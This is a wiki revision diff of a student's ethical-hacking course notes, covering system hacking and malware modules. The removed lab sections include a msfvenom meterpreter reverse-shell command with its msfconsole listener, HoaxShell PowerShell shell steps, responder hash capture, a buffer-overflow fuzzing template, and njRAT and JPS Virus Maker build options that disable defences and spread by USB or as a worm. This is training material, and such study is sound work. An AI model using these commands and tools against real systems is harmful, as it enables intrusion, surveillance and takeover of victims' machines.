Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió
Revisió prèvia
info:cursos:pue:ethical-hacker:sesion2 [18/02/2025 11:12] – [lab 2: Perform Privilege Escalation to Gain Higher Privileges] mateinfo:cursos:pue:ethical-hacker:sesion2 [20/02/2025 23:51] (actual) mate
Línia 3: Línia 3:
  
 == clase == clase
-  * Modulo 06+  * ASPEN 
 +    * Modulo 06 - System Hacking 
 +    * Modulo 07 - Malware 
 +    * Modulo 08 - Sniffing
  
 === Modulo 06, apuntes === Modulo 06, apuntes
  
  
-=== Modulo 06+=== Modulo 06 - System Hacking
 ==== sección 1 ==== sección 1
   * hash   * hash
Línia 149: Línia 152:
   * ''history''   * ''history''
  
-=== Lab 1: Sytem hacking 
-==== task 1: Gain Access to the System 
-  - ''sudo responder -I eth0'' -> capturar hash máquina W11 en txt -> hash.txt 
-  - ''john hash.txt'' -> desencripta la contraseña del hash 
- 
-==== task 2: Gain Access to a Remote System using Reverse Shell Generator 
-===== cmd 
-  * ''docker run -d -p 80:80 reverse_shell_generator'' 
-  * ''http://localhost'' 
-    * IP, Port, MSFVenom -> genera instrucción: ''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' 
-    * se genera un EXE - payload (que hemos de conseguir que ejecute la víctima) 
-    * generamos la instrucción para escuchar el payload, en la sección LISTENER, modo **msfconsole** 
-      * ''msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit"'' 
-    * ejecutamos el listener, ejecutamos el payload 
-      * ''getuid'' 
- 
-===== powershell 
-  * ''http://localhost'' 
-    * HoaxShell -> PowerShell IEX -> cambiar puerto en el script generado por 444 
-    * copiar y guardar en shell.ps1 
-    * ir a la sección **listener** y generar para HoaxShell (puerto 444) 
-    * ejecutar instrucción generada con sudo: ''sudo python...'' 
-    * ejecutamos en un powershell subido a Administrador el script .ps1 
- 
-==== Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System 
-  * ejecutar como administrador ''vulnserver'' (buffer overflow tools) 
-  * instalar **ImmunityDebugger_1_85_setup.exe** (y Python 2.7) 
-  * ejecutar como administrador 
-    * File -> Attach -> vulnserver <- pausado 
-    * Icono PLAY 
-  * en Linux, ejecutamos ''nc -nv 10.10.1.11 9999'' 
-    * HELP nos lista los comandos disponibles 
-    * QUIT para salir 
-    * creamos un "spike template" -> ''pluma stats.spk'':<code>s_readline(); 
- 
-s_string(“STATS ”); 
- 
-s_string_variable(“0”);</code> 
-    * ''generic_send_tcp 10.10.1.11 9999 stats.spk 0 0'' 
-      * los dos últimos ceros son SKIPVAR y SKIPSTR 
-    * ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable 
-    * Se hace lo mismo cambiando **STAT** por **TRUN** 
-    * PENDIENTE 
- 
-=== lab 2: Perform Privilege Escalation to Gain Higher Privileges 
-==== Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys 
-  * PENDIENTE 
  
 === Modulo 7: malware === Modulo 7: malware
Línia 249: Línia 205:
   * https://www.hackplayers.com/2024/08/windows-downdate-downgrade.html - Windows Downdate: desactualiza tu Windows, y reporta que está actualizado.   * https://www.hackplayers.com/2024/08/windows-downdate-downgrade.html - Windows Downdate: desactualiza tu Windows, y reporta que está actualizado.
   * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux - Microsoft Defender ATP for Linux   * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux - Microsoft Defender ATP for Linux
- 
  
  
Línia 285: Línia 240:
     * nmap detecta (script)     * nmap detecta (script)
  
-=== Lab 1: Gain Access to the Target System using Trojans 
-==== Task 1: Gain Control over a Victim Machine using the njRAT RAT Trojan 
-  * njRAT v0.8d 
-    * puerto 5553 
-    * Build 
-      * Host (IP máquina local) 
-      * Randomize Stub 
-      * USB Spread Nj8d 
-      * Protect Process (BSOD) 
-    * Copiar .exe en maquina víctima y ejecutar 
-    * en ese mismo momento, aparece información en el RAT {{:info:cursos:pue:ethical-hacker:pasted:20250218-063959.png?300}} 
-      * archivos 
-      * tareas 
-      * registro 
-      * remote desktop 
-      * control de camara 
-      * keylogger 
- 
-=== Lab 2: Infect the Target System using a Virus 
-==== Task 1: Create a Virus using the JPS Virus Maker Tool and Infect the Target System 
-  * JPS Virus Maker 
-    * marcar Auto Startup 
-    * Disable TaskManager 
-    * Disable Windows Update 
-    * Disable Control Panel 
-    * Disable Drives 
-    * Hide Desktop Icons 
-    * Enable Remote Desktop 
-    * Remove Bluetooth 
-    * Turn Off Windows Firewall 
-    * Turn Off Windows Defender 
-    * en opciones: 
-      * Change Windows Password 
-      * Change Computer Name 
-      * Enable Convert to Worm 
-      * JPG Icon 
- 
-=== Lab 3: Perform Static Malware Analysis 
-==== Task 1: Perform Malware Scanning using Hybrid Analysis 
-  * https://hybrid-analysis.com 
-==== Task 2: Analyze ELF Executable File using Detect It Easy (DIE) 
-  * Detect It Easy v3.09 
-==== Task 3: Perform Malware Disassembly using IDA and OllyDbg 
-  * IDA Freeware 8.4 
  
-=== Examen+== Examen
   * udemy test   * udemy test
   * examtopics (pago)   * examtopics (pago)
   * ProxMox   * ProxMox
  • info/cursos/pue/ethical-hacker/sesion2.1739905960.txt.gz
  • Darrera modificació: 18/02/2025 11:12
  • per mate